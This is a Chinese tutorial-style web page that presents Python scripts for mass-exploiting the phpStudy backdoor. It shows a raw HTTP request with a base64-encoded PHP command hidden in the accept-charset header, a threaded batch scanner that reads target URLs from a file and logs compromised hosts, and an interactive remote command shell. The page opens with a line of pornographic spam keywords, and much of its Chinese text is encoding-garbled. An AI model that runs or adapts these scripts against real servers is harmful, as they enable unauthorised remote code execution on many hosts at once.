亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

phpstudy后門(mén)rce批量利用腳本的實(shí)現(xiàn)

 更新時(shí)間:2019年12月12日 14:17:25   作者:卿先生  
這篇文章主要介紹了phpstudy后門(mén)rce批量利用腳本的實(shí)現(xiàn),文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧

寫(xiě)兩個(gè)一個(gè)批量檢測(cè)的 一個(gè)交互式shell的

暫時(shí)py 圖形化的qt寫(xiě)出來(lái)..有點(diǎn)問(wèn)題

后門(mén)包 :

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
accept-charset: ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding: gzip,deflate
Upgrade-Insecure-Requests: 1

執(zhí)行那段寫(xiě)shell即可

晚上抽點(diǎn)空簡(jiǎn)單寫(xiě)個(gè)發(fā)包的py:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import queue


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")
payload = "echo \"qing\";"
payload = base64.b64encode(payload.encode('utf-8'))
payload = str(payload, 'utf-8')
headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}



def write_shell(url,headers):
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

url = "http://xxx"
write_shell(url=url,headers=headers)

界面優(yōu)化、改下多線程、批量讀取文本文件后的代碼:

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool


print("======Phpstudy Backdoor Exploit============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")




def write_shell(url):
  payload = "echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
}
  try:
    r = requests.get(url=url+'/index.php', headers=headers, verify=False,timeout=30)
    if "qing" in r.text:
      print ('[ + ] BackDoor successful: '+url+'===============[ + ]\n')
      with open('success.txt','a') as f:
          f.write(url+'\n')
    else:
      print ('[ - ] BackDoor failed: '+url+'[ - ]\n')
  except:
    print ('[ - ] Timeout: '+url+' [ - ]\n')

# url = "http://xxx"
# write_shell(url=url,headers=headers)

def main():
  with open('url.txt','r') as f:
    lines = f.read().splitlines()
    task_pool=threadpool.ThreadPool(5)
    requests=threadpool.makeRequests(write_shell,lines)
  for req in requests:
    task_pool.putRequest(req)
    task_pool.wait() 
if __name__ == '__main__':
  main()


#線程隊(duì)列部分
# th=[]
# th_num=10
# for x in range(th_num):
#     t=threading.Thread(target=write_shell)
#     th.append(t)
# for x in range(th_num):
#     th[x].start()
# for x in range(th_num):
#     th[x].join()

你也可以加上讀取php文件的字典 這個(gè)簡(jiǎn)單沒(méi)啥說(shuō)的

下一個(gè)是交互式shell

#!/usr/bin/env python3
#-*- encoding:utf-8 -*-
# 卿 博客:https://www.cnblogs.com/-qing-/

import base64
import requests
import threading
import threadpool
import re

print("======Phpstudy Backdoor Exploit---os-shell============\n")
print("===========By Qing=================\n")
print("=====Blog:https://www.cnblogs.com/-qing-/==\n")



def os_shell(url,headers,payload):
  try:
    r = requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10)
    # print(r.text)
    res = re.findall("qing(.*?)qing",r.text,re.S)
    print("[ + ]===========The Response:==========[ + ]\n")
    res = "".join(res)
    print(res)
  except:
    print("[ - ]===========Failed! Timeout...==========[ - ]\n")

def main():
  url = input("input the Url , example:\"http://127.0.0.1/\"\n")
  payload = input("input the payload , default:echo system(\"whoami\");\n")
  de_payload = "echo \"qing\";system(\"whoami\");echo \"qing\";"
  if payload.strip() == '':
    payload = de_payload
  payload = "echo \"qing\";"+payload+"echo \"qing\";"
  payload = base64.b64encode(payload.encode('utf-8'))
  payload = str(payload, 'utf-8')
  headers = {
  'Upgrade-Insecure-Requests': '1',
  'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
  'Accept-Language': 'zh-CN,zh;q=0.9',
  'accept-charset': payload,
  'Accept-Encoding': 'gzip,deflate',
  'Connection': 'close',
  }
  os_shell(url=url,headers=headers,payload=payload)
if __name__ == '__main__':
  main()

 以上就是本文的全部?jī)?nèi)容,希望對(duì)大家的學(xué)習(xí)有所幫助,也希望大家多多支持腳本之家。

相關(guān)文章

  • 給ECShop添加最新評(píng)論

    給ECShop添加最新評(píng)論

    這篇文章主要介紹了給ECShop添加最新評(píng)論的方法及代碼分享,需要的朋友可以參考下
    2015-01-01
  • 通過(guò)dbi使用perl連接mysql數(shù)據(jù)庫(kù)的方法

    通過(guò)dbi使用perl連接mysql數(shù)據(jù)庫(kù)的方法

    這篇文章主要介紹了通過(guò)dbi使用perl連接mysql數(shù)據(jù)庫(kù)的方法,需要的朋友可以參考下
    2014-04-04
  • 在Win7 中為php擴(kuò)展配置Xcache

    在Win7 中為php擴(kuò)展配置Xcache

    XCache是一個(gè)又快又穩(wěn)定的PHP opcode緩存器.經(jīng)過(guò)良好的測(cè)試并在大流量/高負(fù)載的生產(chǎn)機(jī)器上穩(wěn)定運(yùn)行.經(jīng)過(guò)(在linux上)測(cè)試并支持所有現(xiàn)行PHP分支的最新發(fā)布版本,如php5.0~5.6(x64和x86),并支持線程安全/Windows.與同類(lèi)opcode緩存器相比更勝一籌, 比如能夠快速跟進(jìn)PHP版本.
    2014-10-10
  • php 創(chuàng)建以UNIX時(shí)間戳命名的文件夾(示例代碼)

    php 創(chuàng)建以UNIX時(shí)間戳命名的文件夾(示例代碼)

    這篇文章主要介紹了php創(chuàng)建以UNIX時(shí)間戳命名的文件夾(示例代碼)。需要的朋友可以過(guò)來(lái)參考下,希望對(duì)大家有所幫助
    2014-03-03
  • 詳解PHP防止盜鏈防止迅雷下載的方法

    詳解PHP防止盜鏈防止迅雷下載的方法

    本篇文章主要介紹了詳解PHP防止盜鏈防止迅雷下載的方法,小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2017-04-04
  • PHP按一定比例壓縮圖片的方法

    PHP按一定比例壓縮圖片的方法

    這篇文章主要為大家詳細(xì)介紹了PHP按一定比例壓縮圖片的方法,保持清晰度具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2018-10-10
  • 淺談lumen的自定義依賴(lài)注入

    淺談lumen的自定義依賴(lài)注入

    下面小編就為大家?guī)?lái)一篇淺談lumen的自定義依賴(lài)注入。小編覺(jué)得挺不錯(cuò)的,現(xiàn)在就分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2017-08-08
  • php實(shí)現(xiàn)rc4加密算法代碼

    php實(shí)現(xiàn)rc4加密算法代碼

    此算法的解密方法是重新加密一次,便可還原,需要的朋友可以參考下
    2012-04-04
  • thinkPHP和onethink微信支付插件分享

    thinkPHP和onethink微信支付插件分享

    這篇文章主要是給大家分享了thinkPHP和onethink微信支付插件,小編覺(jué)得挺不錯(cuò)的,也給大家做個(gè)參考。
    2019-08-08
  • PHPMailer發(fā)送HTML內(nèi)容、帶附件的郵件實(shí)例

    PHPMailer發(fā)送HTML內(nèi)容、帶附件的郵件實(shí)例

    這篇文章主要介紹了PHPMailer發(fā)送HTML內(nèi)容、帶附件的郵件實(shí)例,發(fā)送的內(nèi)容包含圖片和文字,附件則發(fā)送的一個(gè)EXCEL表,需要的朋友可以參考下
    2014-07-07

最新評(píng)論